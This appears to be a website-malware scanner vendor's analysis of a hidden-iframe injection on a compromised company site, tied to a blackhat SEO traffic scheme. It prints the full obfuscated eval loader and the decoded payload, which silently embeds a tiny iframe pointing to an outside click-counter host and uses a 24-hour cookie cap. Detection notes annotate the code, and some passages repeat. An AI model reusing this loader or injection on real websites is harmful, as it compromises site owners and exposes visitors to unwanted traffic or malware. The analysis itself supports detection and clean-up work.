Hidden iframes are still a popular blackhat SEO technique to drive "unique visitors"
Another victim of malicious hidden iframe injection was detected today with the Online Website Malware Scanner. The compromised company's website not only offers IT security services, but it also shared its traffic with a website from a completely different industry (a Thailand website selling pharma products).
This particular case, like other similar attacks, is likely part of a paid "iframe-traffic shop" blackhat SEO service. The customer buys visitors to his website to improve its search engine ranking. The .php file linked in the iframe appeared to do nothing and contained only the string "OK" (at the time this article was written). The name clk.php is obviously a click-counter used to build the reports presented to the "customers". The decoded payload injects the hidden iframe once per 24-hour period to generate "unique visitor" traffic.
This particular case, like other similar attacks, is likely part of a paid "iframe-traffic shop" blackhat SEO service. The customer buys visitors to his website to improve its search engine ranking. The .php file linked in the iframe appeared to do nothing and contained only the string "OK" (at the time this article was written). The name clk.php is obviously a click-counter used to build the reports presented to the "customers". The decoded payload injects the hidden iframe once per 24-hour period to generate "unique visitor" traffic.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources (websites).
Website malware scanner report
Submission date: Mon Apr 29 06:44:07 2013
Infected website's files: 10
Malware entry
Malware entry details.
Beautified script
- // Obtains the String constructor via eval over a concatenated literal; the split
- // avoids a literal "String" token in the source (plausibly to evade naive
- // signature scans). Detection note: eval() applied to string fragments is a
- // loader pattern worth flagging on its own.
- ss = eval("Str" + "ing");
- // Short alias for document, used by the environment probe that follows.
- d = document;
- a ="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,79,74,67,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,79,74,67,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,68,71,74,6f,71,74,67,6e,6b,68,67,30,70,67,76,31,6b,70,78,67,70,76,31,65,6e,6d,30,72,6a,72,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,72,71,75,6b,76,6b,71,70,22,3f,22,29,63,64,75,71,6e,77,76,67,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,64,71,74,66,67,74,22,3f,22,29,32,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,6a,67,6b,69,6a,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,79,6b,66,76,6a,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,6e,67,68,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,76,71,72,22,3f,22,29,33,72,7a,29,3d,f,c,f,c,22,22,22,22,6b,68,22,2a,23,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,69,79,74,67,29,2b,2b,22,7d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,79,74,6b,76,67,2a,29,3e,66,6b,78,22,6b,66,3f,5e,29,69,79,74,67,5e,29,40,3e,31,66,6b,78,40,29,2b,3d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,69,79,74,67,29,2b,30,63,72,72,67,70,66,45,6a,6b,6e,66,2a,69,79,74,67,2b,3d,f,c,22,22,22,22,7f,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,55,67,76,45,71,71,6d,6b,67,2a,65,71,71,6d,6b,67,50,63,6f,67,2e,65,71,71,6d,6b,67,58,63,6e,77,67,2e,70,46,63,7b,75,2e,72,63,76,6a,2b,22,7d,f,c,22,78,63,74,22,76,71,66,63,7b,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,78,63,74,22,67,7a,72,6b,74,67,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,6b,68,22,2a,70,46,63,7b,75,3f,3f,70,77,6e,6e,22,7e,7e,22,70,46,63,7b,75,3f,3f,32,2b,22,70,46,63,7b,75,3f,33,3d,f,c,22,67,7a,72,6b,74,67,30,75,67,76,56,6b,6f,67,2a,76,71,66,63,7b,30,69,67,76,56,6b,6f,67,2a,2b,22,2d,22,35,38,32,32,
32,32,32,2c,34,36,2c,70,46,63,7b,75,2b,3d,f,c,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,22,3f,22,65,71,71,6d,6b,67,50,63,6f,67,2d,24,3f,24,2d,67,75,65,63,72,67,2a,65,71,71,6d,6b,67,58,63,6e,77,67,2b,f,c,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,2d,22,24,3d,67,7a,72,6b,74,67,75,3f,24,22,2d,22,67,7a,72,6b,74,67,30,76,71,49,4f,56,55,76,74,6b,70,69,2a,2b,22,2d,22,2a,2a,72,63,76,6a,2b,22,41,22,24,3d,22,72,63,76,6a,3f,24,22,2d,22,72,63,76,6a,22,3c,22,24,24,2b,3d,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,49,67,76,45,71,71,6d,6b,67,2a,22,70,63,6f,67,22,2b,22,7d,f,c,22,78,63,74,22,75,76,63,74,76,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,70,63,6f,67,22,2d,22,24,3f,24,22,2b,3d,f,c,22,78,63,74,22,6e,67,70,22,3f,22,75,76,63,74,76,22,2d,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2d,22,33,3d,f,c,22,6b,68,22,2a,22,2a,22,23,75,76,63,74,76,22,2b,22,28,28,f,c,22,2a,22,70,63,6f,67,22,23,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,32,2e,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2b,22,2b,22,2b,f,c,22,7d,f,c,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,7f,f,c,22,6b,68,22,2a,22,75,76,63,74,76,22,3f,3f,22,2f,33,22,2b,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,78,63,74,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,24,3d,24,2e,22,6e,67,70,22,2b,3d,f,c,22,6b,68,22,2a,22,67,70,66,22,3f,3f,22,2f,33,22,2b,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6e,67,70,69,76,6a,3d,f,c,22,74,67,76,77,74,70,22,77,70,67,75,65,63,72,67,2a,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,6e,67,70,2e,22,67,70,66,22,2b,22,2b,3d,f,c,7f,f,c,6b,68,22,2a,70,63,78,6b,69,63,76,71,74,30,65,71,71,6d,6b,67,47,70,63,64,6e,67,66,2b,f,c,7d,f,c,6b,68,2a,49,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2b,3f,3f,37,37,2b,7d,7f,67,6e,75,67,7d,55,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2e,22,2
9,37,37,29,2e,22,29,33,29,2e,22,29,31,29,2b,3d,f,c,f,c,7c,7c,7c,68,68,68,2a,2b,3d,f,c,7f,f,c,7f".split(",");
- // Decoder: every comma-separated token in a[] is a hex character code offset
- // by +2 (e.g. "68" -> 0x68 - 2 = 0x66 = 'f', the start of "function"), so the
- // loop turns the array into the plain character codes of the payload.
- for (i = 0; i < a.length; i++) {
- a[i] = parseInt(a[i], 16) - (5 - 3);
- }
- // Environment probe: zz is only defined (as 0) if decrementing document.body
- // throws; in a real browser the resulting assignment of a non-element to
- // document.body presumably fails with a TypeError, so this branch is taken.
- try {
- d.body--
- } catch (q) {
- zz = 0;
- }
- // If zz was never declared, reading it here throws a ReferenceError and zz
- // becomes 1, which suppresses execution below; otherwise 0 & 2 keeps zz at 0.
- // Net effect: the payload runs only where the first probe threw.
- try {
- zz &= 2
- } catch (q) {
- zz = 1;
- }
- // Execution gate: with zz == 0 and window.document present, the decoded codes
- // are assembled with String.fromCharCode and eval'd. The result is the
- // hidden-iframe payload shown further down this page.
- // Detection note: eval(X.fromCharCode.apply(X, numericArray)) is a classic
- // obfuscated-loader signature for content scanners.
- if (!zz) if (window.document) eval(ss.fromCharCode.apply(ss, a));
Malicious payload
The decoded payload generates a hidden iframe pointing to http://formorelife.net/invent/clk.php
Here cookies are used to inject the iframe only once per 24-hour period.
- // Creates a 1x1 px, borderless, absolutely positioned iframe (effectively
- // invisible to the visitor) that loads the click-counter URL, and attaches
- // it to the page at most once per page load.
- // Detection note: a tiny absolute-positioned iframe inserted via
- // document.write is a common hidden-iframe fingerprint for content scanners;
- // the src host/path here is the indicator to search for in site files.
- function zzzfff() {
- var gwre = document.createElement('iframe');
- gwre.src = 'http://formorelife.net/invent/clk.php';
- gwre.style.position = 'absolute';
- gwre.style.border = '0';
- gwre.style.height = '1px';
- gwre.style.width = '1px';
- gwre.style.left = '1px';
- gwre.style.top = '1px';
- // Guard: only insert if the container div is not already in the DOM; the
- // div is written inline and the iframe is appended to it.
- if (!document.getElementById('gwre')) {
- document.write('<div id=\'gwre\'></div>');
- document.getElementById('gwre').appendChild(gwre);
- }
- }
Here cookies are used to inject the iframe only once per 24-hour period.
-
// Writes a cookie "cookieName=cookieValue" that expires nDays * 24 hours from
// now. A null/undefined or zero nDays falls back to 1 day, which is the
// 24-hour frequency cap referenced in the article. The value goes through the
// legacy escape() encoder; path is appended only when truthy.
function SetCookie(cookieName, cookieValue, nDays, path) {
-
var today = new Date();
-
var expire = new Date();
-
// Loose equality: catches both null and undefined, plus 0.
if (nDays == null || nDays == 0) nDays = 1;
-
// 3600000 ms = 1 hour.
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
-
document.cookie = cookieName + "=" + escape(cookieValue)
-
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
-
}
-
-
// Reads the value of the cookie called name from document.cookie, returning
// the unescape()'d value or null when not present. The lookup is a plain
// substring search for "name=", so a longer cookie name that ends in name
// would also match.
function GetCookie(name) {
-
var start = document.cookie.indexOf(name + "=");
-
// Index of the first character of the value (skips "name=").
var len = start + name.length + 1;
-
// Only taken when start === 0 (the cookie string begins with the match);
// the prefix re-check appears redundant given indexOf already returned 0.
if ((!start) &&
-
(name != document.cookie.substring(0, name.length)))
-
{
-
return null;
-
}
-
-
// Not found at all.
if (start == -1) return null;
-
// Value runs to the next ";" or to the end of the cookie string.
var end = document.cookie.indexOf(";", len);
-
if (end == -1) end = document.cookie.length;
-
return unescape(document.cookie.substring(len, end));
-
}
-
-
// Frequency cap: when cookies are enabled, the iframe is injected only if the
// marker cookie visited_uq=55 is absent; the marker is then set for 1 day on
// the site-wide path "/" so each visitor is counted once per 24 hours.
// The == comparison coerces the cookie string '55' to the number 55.
// Detection note: a visited_uq cookie with value 55 on a site is an artifact
// indicating this payload has executed for that visitor.
if (navigator.cookieEnabled)
-
{
-
if (GetCookie('visited_uq') == 55) {} else {
-
SetCookie('visited_uq', '55', '1', '/');
-
zzzfff();
-
}
-
}
// Writes a cookie "cookieName=cookieValue" that expires nDays * 24 hours from
// now. A null/undefined or zero nDays falls back to 1 day, which is the
// 24-hour frequency cap referenced in the article. The value goes through the
// legacy escape() encoder; path is appended only when truthy.
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
// Loose equality: catches both null and undefined, plus 0.
if (nDays == null || nDays == 0) nDays = 1;
// 3600000 ms = 1 hour.
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
// Reads the value of the cookie called name from document.cookie, returning
// the unescape()'d value or null when not present. The lookup is a plain
// substring search for "name=", so a longer cookie name that ends in name
// would also match.
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
// Index of the first character of the value (skips "name=").
var len = start + name.length + 1;
// Only taken when start === 0 (the cookie string begins with the match);
// the prefix re-check appears redundant given indexOf already returned 0.
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
// Not found at all.
if (start == -1) return null;
// Value runs to the next ";" or to the end of the cookie string.
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
// Frequency cap: when cookies are enabled, the iframe is injected only if the
// marker cookie visited_uq=55 is absent; the marker is then set for 1 day on
// the site-wide path "/" so each visitor is counted once per 24 hours.
// The == comparison coerces the cookie string '55' to the number 55.
// Detection note: a visited_uq cookie with value 55 on a site is an artifact
// indicating this payload has executed for that visitor.
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}
Malware clean-up
Such malware is often hidden inside JavaScript files. If you suspect that your website has been infected by similar malware, please use Website Anti-malware Monitoring for a remediation assessment.